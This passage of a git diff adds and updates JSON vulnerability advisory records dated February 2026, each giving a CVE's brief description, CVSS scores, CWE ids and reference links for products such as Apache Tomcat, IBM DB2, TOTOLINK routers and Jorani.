"type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27904" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g268-rwhc-cj9f/GHSA-g268-rwhc-cj9f.json b/advisories/unreviewed/2026/02/GHSA-g268-rwhc-cj9f/GHSA-g268-rwhc-cj9f.json new file mode 100644 index 0000000000000..5d821da9b85be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g268-rwhc-cj9f/GHSA-g268-rwhc-cj9f.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g268-rwhc-cj9f", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-67102" + ], + "details": "A SQL injection vulnerability in the alldayoffs feature in Jorani up to v1.0.4, allows an authenticated attacker to execute arbitrary SQL commands via the entity parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67102" + }, + { + "type": "WEB", + "url": "https://github.com/bbalet/jorani" + }, + { + "type": "WEB", + "url": "https://www.helx.io/blog/advisory-jorani" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g989-fg9h-96pr/GHSA-g989-fg9h-96pr.json b/advisories/unreviewed/2026/02/GHSA-g989-fg9h-96pr/GHSA-g989-fg9h-96pr.json index 1e6c391f78b85..ca0b4d6c8c847 100644 --- a/advisories/unreviewed/2026/02/GHSA-g989-fg9h-96pr/GHSA-g989-fg9h-96pr.json +++ b/advisories/unreviewed/2026/02/GHSA-g989-fg9h-96pr/GHSA-g989-fg9h-96pr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g989-fg9h-96pr", - "modified": "2026-02-17T15:31:34Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70954" @@ -34,6 +34,10 @@ { "type": "WEB", "url": "https://mp.weixin.qq.com/s/IbRKrCKdMyIi-azkuqOOvg" + }, + { + "type": "WEB", + "url": "https://www.tonbit.xyz/blog/post/TonBit-Discovers-Critical-Vulnerability-on-TON-Virtual-Machine-for-the-Third-Time-Once-Again-Receiving-Official-Recognition-from-the-TON-Team.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-gpj4-p4vm-jmrr/GHSA-gpj4-p4vm-jmrr.json b/advisories/unreviewed/2026/02/GHSA-gpj4-p4vm-jmrr/GHSA-gpj4-p4vm-jmrr.json new file mode 100644 index 0000000000000..6e080becd6be3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gpj4-p4vm-jmrr/GHSA-gpj4-p4vm-jmrr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gpj4-p4vm-jmrr", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-13691" + ], + "details": "IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13691" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259956" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gr4h-93qx-7636/GHSA-gr4h-93qx-7636.json b/advisories/unreviewed/2026/02/GHSA-gr4h-93qx-7636/GHSA-gr4h-93qx-7636.json new file mode 100644 index 0000000000000..941546bfbb42a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gr4h-93qx-7636/GHSA-gr4h-93qx-7636.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gr4h-93qx-7636", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-22284" + ], + "details": "Dell SmartFabric OS10 Software, versions prior to 10.5.6.12, contains an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22284" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000429181/dsa-2026-033-security-update-for-dell-networking-os10-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hf4g-rr9m-7fx6/GHSA-hf4g-rr9m-7fx6.json b/advisories/unreviewed/2026/02/GHSA-hf4g-rr9m-7fx6/GHSA-hf4g-rr9m-7fx6.json new file mode 100644 index 0000000000000..de13b699c3e3c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hf4g-rr9m-7fx6/GHSA-hf4g-rr9m-7fx6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hf4g-rr9m-7fx6", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-32355" + ], + "details": "Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32355" + }, + { + "type": "WEB", + "url": "https://www.rcesecurity.com" + }, + { + "type": "WEB", + "url": "https://www.rcesecurity.com/advisories/cve-2025-32355" + }, + { + "type": "WEB", + "url": "https://www.rocketsoftware.com/products/rocket-b2b-supply-chain-integration/rocket-trufusion-enterprise" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hp59-976f-xjmx/GHSA-hp59-976f-xjmx.json b/advisories/unreviewed/2026/02/GHSA-hp59-976f-xjmx/GHSA-hp59-976f-xjmx.json new file mode 100644 index 0000000000000..fb8b0abf5b638 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hp59-976f-xjmx/GHSA-hp59-976f-xjmx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hp59-976f-xjmx", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27900" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27900" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jwv5-943c-f5wh/GHSA-jwv5-943c-f5wh.json b/advisories/unreviewed/2026/02/GHSA-jwv5-943c-f5wh/GHSA-jwv5-943c-f5wh.json index 33d6b81fb36be..5903af54afeb2 100644 --- a/advisories/unreviewed/2026/02/GHSA-jwv5-943c-f5wh/GHSA-jwv5-943c-f5wh.json +++ b/advisories/unreviewed/2026/02/GHSA-jwv5-943c-f5wh/GHSA-jwv5-943c-f5wh.json @@ -30,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-290" + "CWE-290", + "CWE-451" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json b/advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json index 75112a7d5a618..3311a1c280ff4 100644 --- a/advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json +++ b/advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m2gf-58fp-54j4", - "modified": "2026-02-13T00:32:51Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-13T00:32:51Z", "aliases": [ "CVE-2026-1358" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1358" }, + { + "type": "WEB", + "url": "https://airleader.us/contact" + }, { "type": "WEB", "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-043-10.json" diff --git a/advisories/unreviewed/2026/02/GHSA-mgp5-rv84-w37q/GHSA-mgp5-rv84-w37q.json b/advisories/unreviewed/2026/02/GHSA-mgp5-rv84-w37q/GHSA-mgp5-rv84-w37q.json new file mode 100644 index 0000000000000..f1b973b89ed8b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mgp5-rv84-w37q/GHSA-mgp5-rv84-w37q.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mgp5-rv84-w37q", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2026-24734" + ], + "details": "Improper Input Validation vulnerability in Apache Tomcat Native, Apache Tomcat.\n\nWhen using an OCSP responder, Tomcat Native (and Tomcat's FFM port of the Tomcat Native code) did not complete verification or freshness checks on the OCSP response which could allow certificate revocation to be bypassed.\n\nThis issue affects Apache Tomcat Native:  from 1.3.0 through 1.3.4, from 2.0.0 through 2.0.11; Apache Tomcat: from 11.0.0-M1 through 11.0.17, from 10.1.0-M7 through 10.1.51, from 9.0.83 through 9.0.114.\n\n\nThe following versions were EOL at the time the CVE was created but are \nknown to be affected: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39. Older EOL versions are not affected.\n\nApache Tomcat Native users are recommended to upgrade to versions 1.3.5 or later or 2.0.12 or later, which fix the issue.\n\nApache Tomcat users are recommended to upgrade to versions 11.0.18 or later, 10.1.52 or later or 9.0.115 or later which fix the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24734" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/292dlmx3fz1888v6v16221kpozq56gml" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mrc8-4r2p-q3ww/GHSA-mrc8-4r2p-q3ww.json b/advisories/unreviewed/2026/02/GHSA-mrc8-4r2p-q3ww/GHSA-mrc8-4r2p-q3ww.json new file mode 100644 index 0000000000000..7c8f82075dbf5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mrc8-4r2p-q3ww/GHSA-mrc8-4r2p-q3ww.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mrc8-4r2p-q3ww", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-2621" + ], + "details": "A security vulnerability has been detected in Sciyon Koyuan Thermoelectricity Heat Network Management System 3.0. This affects an unknown part of the file /SISReport/WebReport20/Proxy/AsyncTreeProxy.aspx. The manipulation of the argument PGUID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2621" + }, + { + "type": "WEB", + "url": "https://github.com/red88-debug/CVEs/blob/main/Koyuan%20Thermoelectricity%20Heat%20Network%20Management%20System%20SQL%20Injection%20Vulnerability.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751809" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p2vv-8mpq-57x2/GHSA-p2vv-8mpq-57x2.json b/advisories/unreviewed/2026/02/GHSA-p2vv-8mpq-57x2/GHSA-p2vv-8mpq-57x2.json index 2045abbdd967c..026480e49d8b2 100644 --- a/advisories/unreviewed/2026/02/GHSA-p2vv-8mpq-57x2/GHSA-p2vv-8mpq-57x2.json +++ b/advisories/unreviewed/2026/02/GHSA-p2vv-8mpq-57x2/GHSA-p2vv-8mpq-57x2.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-p2xq-4rwg-xcp7/GHSA-p2xq-4rwg-xcp7.json b/advisories/unreviewed/2026/02/GHSA-p2xq-4rwg-xcp7/GHSA-p2xq-4rwg-xcp7.json new file mode 100644 index 0000000000000..5527c039b6da0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p2xq-4rwg-xcp7/GHSA-p2xq-4rwg-xcp7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p2xq-4rwg-xcp7", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33101" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 could allow an attacker to obtain sensitive information using man in the middle techniques due to improper clearing of heap memory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33101" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-244" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json b/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json new file mode 100644 index 0000000000000..3bbf46aceb5ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p937-j3mh-5m6r", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-70846" + ], + "details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) on the /tools/Password/add page in the input field password.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70846" + }, + { + "type": "WEB", + "url": "https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70846" + }, + { + "type": "WEB", + "url": "https://github.com/lty628/aidigu" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json b/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json index 9b7cb193a2e8e..e34377f86fd72 100644 --- a/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json +++ b/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json new file mode 100644 index 0000000000000..558cd8091de45 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqh8-xq2x-mwg2", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-26732" + ], + "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the vpnUser or vpnPassword` parameters in the formFilter function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26732" + }, + { + "type": "WEB", + "url": "https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RU-boa-formFilter-StackOverflow" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json b/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json new file mode 100644 index 0000000000000..60dcf969ccebe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc7g-qpr2-qpjj", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33130" + ], + "details": "IBM DB2 Merge Backup for Linux, UNIX and Windows 12.1.0.0 could allow an authenticated user to cause the program to crash due to a buffer being overwritten when it is allocated on the stack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33130" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260043" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq5r-98hh-rxc9/GHSA-qq5r-98hh-rxc9.json b/advisories/unreviewed/2026/02/GHSA-qq5r-98hh-rxc9/GHSA-qq5r-98hh-rxc9.json new file mode 100644 index 0000000000000..fc7fa835ba62e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq5r-98hh-rxc9/GHSA-qq5r-98hh-rxc9.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq5r-98hh-rxc9", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2026-24733" + ], + "details": "Improper Input Validation vulnerability in Apache Tomcat.\n\n\nTomcat did not limit HTTP/0.9 requests to the GET method. If a security \nconstraint was configured to allow HEAD requests to a URI but deny GET \nrequests, the user could bypass that constraint on GET requests by \nsending a (specification invalid) HEAD request using HTTP/0.9.\n\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0.M1 through 9.0.112.\n\n\nOlder, EOL versions are also affected.\n\nUsers are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fixes the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24733" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/6xk3t65qpn1myp618krtfotbjn1qt90f" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json new file mode 100644 index 0000000000000..37c01fdb58dfe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvhf-98cj-8779", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2026-26731" + ], + "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the routernamer`parameter in the formDnsv6 function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26731" + }, + { + "type": "WEB", + "url": "https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RU-boa-formDnsv6-StackOverflow" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json b/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json index 4f85327475fc1..eaa933b28c760 100644 --- a/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json +++ b/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json b/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json index 93969a7a35a07..8f013e4c3e9fe 100644 --- a/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json +++ b/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rgxp-2hwp-jwgg", - "modified": "2026-02-17T15:31:35Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-17T15:31:35Z", "aliases": [ "CVE-2026-25087" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://lists.apache.org/thread/mpm4ld1qony30tchfpjtk5b11tcyvmwh" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/17/4" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json b/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json new file mode 100644 index 0000000000000..a150f302cc657 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm24-2x6v-8w7f", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-2622" + ], + "details": "A vulnerability was detected in Blossom up to 1.17.1. This vulnerability affects the function content of the file blossom-backend/backend/src/main/java/com/blossom/backend/server/article/draft/ArticleController.java of the component Article Title Handler. The manipulation results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2622" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/AXa1dpliBomr2Ox6dYJc6jJInEb" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751987" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json b/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json index 7618ec7972a42..82543f1d908da 100644 --- a/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json +++ b/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json b/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json new file mode 100644 index 0000000000000..25e79b3d76e98 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v929-j8mj-vc74", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-23598" + ], + "details": "Vulnerabilities in the API error handling of an HPE Aruba Networking 5G Core server API could allow an unauthenticated remote attacker to obtain sensitive information. Successful exploitation could allow an attacker to access details such as user accounts, roles, and system configuration, as well as to gain insight into internal services and workflows, increasing the risk of unauthorized access and elevated privileges when combined with other vulnerabilities.", + "severity": [ + { + "type": "CVSS_V3", 